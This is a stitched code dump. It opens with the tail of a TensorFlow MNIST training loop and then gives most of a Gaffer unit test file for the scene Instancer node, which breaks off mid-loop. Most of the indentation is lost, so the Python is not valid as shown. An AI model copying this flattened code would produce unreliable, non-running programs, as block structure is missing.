for i in range(NUM_STEPS):
batch = mnist.train.next_batch(MINIBATCH_SIZE)
if i % 100==0:
train_accuracy = sess.run(accuracy, feed_dict={x: batch[0], y_: batch[1],
keep_prob: 1.0})
print("step {}, training accuracy {}".format(i, train_accuracy))
sess.run(train_step, feed_dict={x: batch[0], y_: batch[1],
keep_prob: 0.5})
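    # Evaluate on the test set in 10 chunks of 1,000 images and average the results,
    # rather than feeding all 10,000 images in a single run.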
X = mnist.test.images.reshape(10, 1000, 784)
Y = mnist.test.labels.reshape(10, 1000, 10)
test_accuracy = np.mean([
sess.run(accuracy, feed_dict={x:X[i], y_:Y[i], keep_prob:1.0}) for i in range(10)
])
print("test accuracy: {}".format(test_accuracy))
|
py | 1a4baac47315f5acfac844e9104e88e2abbe6954 | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import imath
import inspect
import six
import time
import unittest
import IECore
import IECoreScene
import Gaffer
import GafferTest
import GafferDispatch
import GafferScene
import GafferSceneTest
class InstancerTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
sphere = IECoreScene.SpherePrimitive()
instanceInput = GafferSceneTest.CompoundObjectSource()
instanceInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( -2 ), imath.V3f( 2 ) ) ),
"children" : {
"sphere" : {
"object" : sphere,
"bound" : IECore.Box3fData( sphere.bound() ),
"transform" : IECore.M44fData( imath.M44f().scale( imath.V3f( 2 ) ) ),
},
}
} )
)
seeds = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( 1, 0, 0 ), imath.V3f( 1, 1, 0 ), imath.V3f( 0, 1, 0 ), imath.V3f( 0, 0, 0 ) ]
)
)
seedsInput = GafferSceneTest.CompoundObjectSource()
seedsInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( 1, 0, 0 ), imath.V3f( 2, 1, 0 ) ) ),
"children" : {
"seeds" : {
"bound" : IECore.Box3fData( seeds.bound() ),
"transform" : IECore.M44fData( imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) ),
"object" : seeds,
},
},
}, )
)
instancer = GafferScene.Instancer()
instancer["in"].setInput( seedsInput["out"] )
instancer["prototypes"].setInput( instanceInput["out"] )
instancer["parent"].setValue( "/seeds" )
instancer["name"].setValue( "instances" )
self.assertEqual( instancer["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/" ), imath.M44f() )
self.assertEqual( instancer["out"].bound( "/" ), imath.Box3f( imath.V3f( -1, -2, -2 ), imath.V3f( 4, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "seeds" ] ) )
self.assertEqual( instancer["out"].object( "/seeds" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/seeds" ), imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) )
self.assertEqual( instancer["out"].bound( "/seeds" ), imath.Box3f( imath.V3f( -2, -2, -2 ), imath.V3f( 3, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/seeds" ), IECore.InternedStringVectorData( [ "instances" ] ) )
self.assertEqual( instancer["out"].object( "/seeds/instances" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/seeds/instances" ), imath.M44f() )
self.assertEqual( instancer["out"].bound( "/seeds/instances" ), imath.Box3f( imath.V3f( -2, -2, -2 ), imath.V3f( 3, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/seeds/instances" ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( instancer["out"].object( "/seeds/instances/sphere" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/seeds/instances/sphere" ), imath.M44f() )
self.assertEqual( instancer["out"].bound( "/seeds/instances/sphere" ), imath.Box3f( imath.V3f( -2, -2, -2 ), imath.V3f( 3, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/seeds/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "1", "2", "3" ] ) )
for i in range( 0, 4 ) :
instancePath = "/seeds/instances/sphere/%d" % i
self.assertEqual( instancer["out"].object( instancePath ), sphere )
self.assertEqual(
instancer["out"].transform( instancePath ),
imath.M44f().scale( imath.V3f( 2 ) ) * imath.M44f().translate( seeds["P"].data[i] )
)
self.assertEqual( instancer["out"].bound( instancePath ), sphere.bound() )
self.assertEqual( instancer["out"].childNames( instancePath ), IECore.InternedStringVectorData() )
# Test paths that don't exist - the transform will trigger an error, the other functions don't depend on
# the index, so will just return a reasonable value
six.assertRaisesRegex( self,
Gaffer.ProcessException,
'Instancer.out.transform : Instance id "77" is invalid, instancer produces only 4 children. Topology may have changed during shutter.',
instancer["out"].transform, "/seeds/instances/sphere/77"
)
self.assertEqual( instancer["out"].object( "/seeds/instances/sphere/77" ), sphere )
self.assertEqual( instancer["out"].bound( "/seeds/instances/sphere/77" ), sphere.bound() )
self.assertEqual( instancer["out"].childNames( "/seeds/instances/sphere/77" ), IECore.InternedStringVectorData() )
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
instancer["enabled"].setValue( True )
# Test encapsulation options
encapInstancer = GafferScene.Instancer()
encapInstancer["in"].setInput( seedsInput["out"] )
encapInstancer["prototypes"].setInput( instanceInput["out"] )
encapInstancer["parent"].setValue( "/seeds" )
encapInstancer["name"].setValue( "instances" )
encapInstancer["encapsulateInstanceGroups"].setValue( True )
unencapFilter = GafferScene.PathFilter()
unencapFilter["paths"].setValue( IECore.StringVectorData( [ "/..." ] ) )
unencap = GafferScene.Unencapsulate()
unencap["in"].setInput( encapInstancer["out"] )
unencap["filter"].setInput( unencapFilter["out"] )
self.assertTrue( isinstance( encapInstancer["out"].object( "/seeds/instances/sphere/" ), GafferScene.Capsule ) )
self.assertEqual( encapInstancer["out"].childNames( "/seeds/instances/sphere/" ), IECore.InternedStringVectorData() )
self.assertScenesEqual( unencap["out"], instancer["out"] )
# Edit seeds object
freezeTransform = GafferScene.FreezeTransform()
freezeTransform["in"].setInput( seedsInput["out"] )
freezeTransform["filter"].setInput( unencapFilter["out"] )
instancer["in"].setInput( freezeTransform["out"] )
encapInstancer["in"].setInput( freezeTransform["out"] )
self.assertScenesEqual( unencap["out"], instancer["out"] )
# Then set it back ( to make sure that returning to a previously cached value after
# changing the seeds doesn't pull an expired Capsule out of the cache )
freezeTransform["enabled"].setValue( False )
self.assertScenesEqual( unencap["out"], instancer["out"] )
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
def testThreading( self ) :
sphere = IECoreScene.SpherePrimitive()
instanceInput = GafferSceneTest.CompoundObjectSource()
instanceInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( -2 ), imath.V3f( 2 ) ) ),
"children" : {
"sphere" : {
"object" : sphere,
"bound" : IECore.Box3fData( sphere.bound() ),
"transform" : IECore.M44fData( imath.M44f().scale( imath.V3f( 2 ) ) ),
},
}
} )
)
seeds = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( 1, 0, 0 ), imath.V3f( 1, 1, 0 ), imath.V3f( 0, 1, 0 ), imath.V3f( 0, 0, 0 ) ]
)
)
seedsInput = GafferSceneTest.CompoundObjectSource()
seedsInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( 1, 0, 0 ), imath.V3f( 2, 1, 0 ) ) ),
"children" : {
"seeds" : {
"bound" : IECore.Box3fData( seeds.bound() ),
"transform" : IECore.M44fData( imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) ),
"object" : seeds,
},
},
}, )
)
instancer = GafferScene.Instancer()
instancer["in"].setInput( seedsInput["out"] )
instancer["prototypes"].setInput( instanceInput["out"] )
instancer["parent"].setValue( "/seeds" )
instancer["name"].setValue( "instances" )
GafferSceneTest.traverseScene( instancer["out"] )
def testNamePlugDefaultValue( self ) :
n = GafferScene.Instancer()
self.assertEqual( n["name"].defaultValue(), "instances" )
self.assertEqual( n["name"].getValue(), "instances" )
def testAffects( self ) :
n = GafferScene.Instancer()
a = n.affects( n["name"] )
self.assertGreaterEqual( { x.relativeName( n ) for x in a }, { "out.childNames", "out.bound", "out.set" } )
def testParentBoundsWhenNoInstances( self ) :
sphere = GafferScene.Sphere()
sphere["type"].setValue( sphere.Type.Primitive ) # no points, so we can't instance onto it
instancer = GafferScene.Instancer()
instancer["in"].setInput( sphere["out"] )
instancer["parent"].setValue( "/sphere" )
instancer["prototypes"].setInput( sphere["out"] )
self.assertSceneValid( instancer["out"] )
self.assertEqual( instancer["out"].bound( "/sphere" ), sphere["out"].bound( "/sphere" ) )
def testEmptyName( self ) :
plane = GafferScene.Plane()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["parent"].setValue( "/plane" )
instancer["name"].setValue( "" )
f = GafferScene.PathFilter()
f["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
deleteObject = GafferScene.DeleteObject()
deleteObject["in"].setInput( plane["out"] )
deleteObject["filter"].setInput( f["out"] )
self.assertScenesEqual( instancer["out"], deleteObject["out"] )
def testEmptyParent( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "" )
self.assertScenesEqual( instancer["out"], plane["out"] )
self.assertSceneHashesEqual( instancer["out"], plane["out"] )
def testSeedsAffectBound( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
h1 = instancer["out"].boundHash( "/plane/instances" )
b1 = instancer["out"].bound( "/plane/instances" )
plane["dimensions"].setValue( plane["dimensions"].getValue() * 2 )
h2 = instancer["out"].boundHash( "/plane/instances" )
b2 = instancer["out"].bound( "/plane/instances" )
self.assertNotEqual( h1, h2 )
self.assertNotEqual( b1, b2 )
def testBoundHashIsStable( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
h = instancer["out"].boundHash( "/plane/instances" )
for i in range( 0, 100 ) :
self.assertEqual( instancer["out"].boundHash( "/plane/instances" ), h )
def testObjectAffectsChildNames( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
cs = GafferTest.CapturingSlot( instancer.plugDirtiedSignal() )
plane["divisions"]["x"].setValue( 2 )
dirtiedPlugs = [ s[0] for s in cs ]
self.assertTrue( instancer["out"]["childNames"] in dirtiedPlugs )
self.assertTrue( instancer["out"]["bound"] in dirtiedPlugs )
self.assertTrue( instancer["out"]["transform"] in dirtiedPlugs )
def testPythonExpressionAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
# The Instancer spawns its own threads, so if we don't release the GIL
# when invoking it, and an upstream node enters Python, we'll end up
		# with a deadlock. Test that this isn't the case. We increment the frame
# between each test to ensure the expression result is not cached and
# we do truly enter python.
with Gaffer.Context() as c :
c.setFrame( 1 )
script["instancer"]["out"]["globals"].getValue()
c.setFrame( 101 )
script["instancer"]["out"]["globals"].hash()
c["scene:path"] = IECore.InternedStringVectorData( [ "plane" ] )
c.setFrame( 2 )
script["instancer"]["out"]["bound"].getValue()
c.setFrame( 3 )
script["instancer"]["out"]["transform"].getValue()
c.setFrame( 4 )
script["instancer"]["out"]["object"].getValue()
c.setFrame( 5 )
script["instancer"]["out"]["attributes"].getValue()
c.setFrame( 6 )
script["instancer"]["out"]["childNames"].getValue()
c.setFrame( 7 )
c.setFrame( 102 )
script["instancer"]["out"]["bound"].hash()
c.setFrame( 103 )
script["instancer"]["out"]["transform"].hash()
c.setFrame( 104 )
script["instancer"]["out"]["object"].hash()
c.setFrame( 105 )
script["instancer"]["out"]["attributes"].hash()
c.setFrame( 106 )
script["instancer"]["out"]["childNames"].hash()
c.setFrame( 107 )
# The same applies for the higher level helper functions on ScenePlug
c.setFrame( 200 )
script["instancer"]["out"].bound( "/plane" )
c.setFrame( 201 )
script["instancer"]["out"].transform( "/plane" )
c.setFrame( 202 )
script["instancer"]["out"].fullTransform( "/plane" )
c.setFrame( 203 )
script["instancer"]["out"].attributes( "/plane" )
c.setFrame( 204 )
script["instancer"]["out"].fullAttributes( "/plane" )
c.setFrame( 205 )
script["instancer"]["out"].object( "/plane" )
c.setFrame( 206 )
script["instancer"]["out"].childNames( "/plane" )
c.setFrame( 207 )
c.setFrame( 300 )
script["instancer"]["out"].boundHash( "/plane" )
c.setFrame( 301 )
script["instancer"]["out"].transformHash( "/plane" )
c.setFrame( 302 )
script["instancer"]["out"].fullTransformHash( "/plane" )
c.setFrame( 303 )
script["instancer"]["out"].attributesHash( "/plane" )
c.setFrame( 304 )
script["instancer"]["out"].fullAttributesHash( "/plane" )
c.setFrame( 305 )
script["instancer"]["out"].objectHash( "/plane" )
c.setFrame( 306 )
script["instancer"]["out"].childNamesHash( "/plane" )
c.setFrame( 307 )
def testDynamicPlugsAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
script["attributes"] = GafferScene.CustomAttributes()
script["attributes"]["in"].setInput( script["instancer"]["out"] )
script["outputs"] = GafferScene.Outputs()
script["outputs"]["in"].setInput( script["attributes"]["out"] )
# Simulate an InteractiveRender or Viewer traversal of the scene
# every time it is dirtied. If the GIL isn't released when dirtiness
# is signalled, we'll end up with a deadlock as the traversal enters
# python on another thread to evaluate the expression. We increment the frame
# between each test to ensure the expression result is not cached and
# we do truly enter python.
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToPlugDirtiedSignal( script["outputs"]["out"] ) )
with Gaffer.Context() as c :
c.setFrame( 1 )
script["attributes"]["attributes"].addChild( Gaffer.NameValuePlug( "test1", IECore.IntData( 10 ) ) )
c.setFrame( 2 )
script["attributes"]["attributes"].addChild( Gaffer.NameValuePlug( "test2", IECore.IntData( 20 ), True ) )
c.setFrame( 3 )
script["attributes"]["attributes"].addMembers(
IECore.CompoundData( {
"test3" : 30,
"test4" : 40,
} )
)
c.setFrame( 4 )
p = script["attributes"]["attributes"][0]
del script["attributes"]["attributes"][p.getName()]
c.setFrame( 5 )
script["attributes"]["attributes"].addChild( p )
c.setFrame( 6 )
script["attributes"]["attributes"].removeChild( p )
c.setFrame( 7 )
script["attributes"]["attributes"].setChild( p.getName(), p )
c.setFrame( 8 )
script["attributes"]["attributes"].removeChild( p )
c.setFrame( 9 )
script["attributes"]["attributes"][p.getName()] = p
c.setFrame( 10 )
script["outputs"].addOutput( "test", IECoreScene.Output( "beauty.exr", "exr", "rgba" ) )
def testLoadReferenceAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = 0.1 + context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
script["box"] = Gaffer.Box()
script["box"]["in"] = GafferScene.ScenePlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
script["box"]["out"] = GafferScene.ScenePlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
script["box"]["out"].setInput( script["box"]["in"] )
script["box"].exportForReference( self.temporaryDirectory() + "/test.grf" )
script["reference"] = Gaffer.Reference()
script["reference"].load( self.temporaryDirectory() + "/test.grf" )
script["reference"]["in"].setInput( script["instancer"]["out"] )
script["attributes"] = GafferScene.CustomAttributes()
script["attributes"]["in"].setInput( script["reference"]["out"] )
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToPlugDirtiedSignal( script["attributes"]["out"] ) )
with Gaffer.Context() as c :
script["reference"].load( self.temporaryDirectory() + "/test.grf" )
def testContextChangedAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.get( 'minRadius', 0.1 ) + context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
context = Gaffer.Context()
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToContextChangedSignal( script["instancer"]["out"], context ) )
with context :
context.setFrame( 10 )
context.setFramesPerSecond( 50 )
context.setTime( 1 )
context.set( "a", 1 )
context.set( "a", 2.0 )
context.set( "a", "a" )
context.set( "a", imath.V2i() )
context.set( "a", imath.V3i() )
context.set( "a", imath.V2f() )
context.set( "a", imath.V3f() )
context.set( "a", imath.Color3f() )
context.set( "a", IECore.BoolData( True ) )
context["b"] = 1
context["b"] = 2.0
context["b"] = "b"
context["b"] = imath.V2i()
context["b"] = imath.V3i()
context["b"] = imath.V2f()
context["b"] = imath.V3f()
context["b"] = imath.Color3f()
context["b"] = IECore.BoolData( True )
with Gaffer.BlockedConnection( traverseConnection ) :
# Must add it with the connection disabled, otherwise
# the addition causes a traversal, and then remove() gets
# all its results from the cache.
context["minRadius"] = 0.2
context.remove( "minRadius" )
with Gaffer.BlockedConnection( traverseConnection ) :
context["minRadius"] = 0.3
del context["minRadius"]
def testDispatchAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.get( 'minRadius', 0.1 ) + context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
script["pythonCommand"] = GafferDispatch.PythonCommand()
script["pythonCommand"]["command"].setValue( "pass" )
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToPreDispatchSignal( script["instancer"]["out"] ) )
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() )
with Gaffer.Context() as c :
for i in range( 1, 10 ) :
c.setFrame( i )
dispatcher.dispatch( [ script["pythonCommand"] ] )
def testTransform( self ) :
point = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( 4, 0, 0 ) ] ) )
point["orientation"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.QuatfVectorData( [ imath.Quatf().setAxisAngle( imath.V3f( 0, 1, 0 ), math.pi / 2.0 ) ] )
)
point["scale"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.V3fVectorData( [ imath.V3f( 2, 3, 4 ) ] )
)
point["uniformScale"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 10 ] )
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( point )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/0" ), imath.M44f().translate( imath.V3f( 4, 0, 0 ) ) )
instancer["orientation"].setValue( "orientation" )
self.assertTrue(
imath.V3f( 4, 0, -1 ).equalWithAbsError(
imath.V3f( 1, 0, 0 ) * instancer["out"].transform( "/object/instances/sphere/0" ),
0.00001
)
)
instancer["scale"].setValue( "scale" )
self.assertTrue(
imath.V3f( 4, 0, -2 ).equalWithAbsError(
imath.V3f( 1, 0, 0 ) * instancer["out"].transform( "/object/instances/sphere/0" ),
0.00001
)
)
instancer["scale"].setValue( "uniformScale" )
self.assertTrue(
imath.V3f( 4, 0, -10 ).equalWithAbsError(
imath.V3f( 1, 0, 0 ) * instancer["out"].transform( "/object/instances/sphere/0" ),
0.00001
)
)
def testIndexedRootsListWithEmptyList( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
cube = GafferScene.Cube()
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cube["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
self.assertEqual( instancer["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/0" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/3" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/1" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/2" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/0" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/3" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/1" ), cube["out"].object( "/cube" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/2" ), cube["out"].object( "/cube" ) )
self.assertSceneValid( instancer["out"] )
def buildPrototypeRootsScript( self ) :
		# we don't strictly require a script, but it's the easiest way to
# maintain references to all the nodes for use in client tests.
script = Gaffer.ScriptNode()
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
# for use with RootPerVertex mode
points["root"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.StringVectorData( [ "/foo", "/bar" ] ),
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
script["objectToScene"] = GafferScene.ObjectToScene()
script["objectToScene"]["object"].setValue( points )
# for use with IndexedRootsVariable mode
script["variables"] = GafferScene.PrimitiveVariables()
script["variables"]["primitiveVariables"].addChild(
Gaffer.NameValuePlug(
"prototypeRoots",
Gaffer.StringVectorDataPlug( "value", defaultValue = IECore.StringVectorData( [ ] ), flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ),
True,
"prototypeRoots",
Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic
)
)
script["variables"]["primitiveVariables"]["prototypeRoots"]["name"].setValue( 'prototypeRoots' )
script["variables"]["in"].setInput( script["objectToScene"]["out"] )
script["filter"] = GafferScene.PathFilter()
script["filter"]["paths"].setValue( IECore.StringVectorData( [ "/object" ] ) )
script["variables"]["filter"].setInput( script["filter"]["out"] )
# /foo/bar/sphere
script["sphere"] = GafferScene.Sphere()
script["group"] = GafferScene.Group()
script["group"]["name"].setValue( "bar" )
script["group"]["in"][0].setInput( script["sphere"]["out"] )
script["group2"] = GafferScene.Group()
script["group2"]["name"].setValue( "foo" )
script["group2"]["in"][0].setInput( script["group"]["out"] )
# /bar/baz/cube
script["cube"] = GafferScene.Cube()
script["group3"] = GafferScene.Group()
script["group3"]["name"].setValue( "baz" )
script["group3"]["in"][0].setInput( script["cube"]["out"] )
script["group4"] = GafferScene.Group()
script["group4"]["name"].setValue( "bar" )
script["group4"]["in"][0].setInput( script["group3"]["out"] )
script["prototypes"] = GafferScene.Parent()
script["prototypes"]["in"].setInput( script["group2"]["out"] )
script["prototypes"]["children"][0].setInput( script["group4"]["out"] )
script["prototypes"]["parent"].setValue( "/" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["variables"]["out"] )
script["instancer"]["prototypes"].setInput( script["prototypes"]["out"] )
script["instancer"]["parent"].setValue( "/object" )
script["instancer"]["prototypeIndex"].setValue( "index" )
return script
def assertRootsMatchPrototypeSceneChildren( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "foo", "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
for i in [ "1", "2" ] :
